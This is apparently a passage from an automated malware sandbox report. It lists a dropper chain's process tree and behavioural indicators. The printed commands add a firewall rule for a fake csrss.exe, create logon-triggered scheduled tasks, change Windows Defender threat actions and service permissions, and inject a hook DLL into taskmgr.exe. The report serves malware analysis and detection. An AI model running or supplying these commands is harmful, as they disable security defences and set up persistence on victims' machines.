powershell.exe Token: SeDebugPrivilege 5268 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6632 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6736 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 6420 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 5656 powershell.exe Token: SeShutdownPrivilege 4708 chrome.exe Token: SeCreatePagefilePrivilege 4708 chrome.exe Token: SeDebugPrivilege 1876 mstc.exe Token: SeShutdownPrivilege 4708 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
d89781e451.exechrome.exeu2r0.3.exepid process 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
d89781e451.exechrome.exeu2r0.3.exepid process 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4708 chrome.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 6272 u2r0.3.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe 4640 d89781e451.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
- pid 2528: run.exe
- pid 2528: run.exe
- pid 1876: mstc.exe
- pid 1456: MSBuild.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exeexplorta.exed89781e451.exechrome.exedescription pid process target process PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 2004 wrote to memory of 5064 2004 fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 4456 5064 explorta.exe explorta.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 2264 5064 explorta.exe amert.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 5064 wrote to memory of 4640 5064 explorta.exe d89781e451.exe PID 4640 wrote to memory of 4708 4640 d89781e451.exe chrome.exe PID 4640 wrote to memory of 4708 4640 d89781e451.exe chrome.exe PID 4708 wrote to memory of 4976 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4976 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote 
to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 2180 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4836 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4836 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 
4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe PID 4708 wrote to memory of 4996 4708 chrome.exe chrome.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe"C:\Users\Admin\AppData\Local\Temp\fe4ad437c55f75aa1dfc976f986023a3d4c528a9e3cfa74761b465b08d42e086.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\d89781e451.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f91aab58,0x7ff8f91aab68,0x7ff8f91aab785⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1680 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4420 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4652 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4700 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4784 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
- Modifies registry class
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5188 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4776 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=1928,i,1602049362784519798,10145341899150502544,131072 /prefetch:85⤵
-
C:\Users\Admin\1000017002\06feb1f97d.exe"C:\Users\Admin\1000017002\06feb1f97d.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"3⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\ZleUyzy9WRVICP6WvVkSUjzN.exe"C:\Users\Admin\Pictures\ZleUyzy9WRVICP6WvVkSUjzN.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2r0.0.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.0.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 26766⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u2r0.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.2\run.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\u2r0.3.exe"C:\Users\Admin\AppData\Local\Temp\u2r0.3.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 9925⤵
- Program crash
-
C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"C:\Users\Admin\Pictures\uon7YhUxbxygHEmdqaGh1jhy.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
-
C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"C:\Users\Admin\Pictures\91jwA6wQnD20jEFlNGHkRWzr.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe"C:\Users\Admin\Pictures\57jo5fUVeWmkZmhmw7Fi2Zof.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\QiAtIglbeauCaEygsP90Kflf.exe"C:\Users\Admin\Pictures\QiAtIglbeauCaEygsP90Kflf.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS7ABE.tmp\Install.exe.\Install.exe /WkfdidVYT "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"7⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 69⤵
-
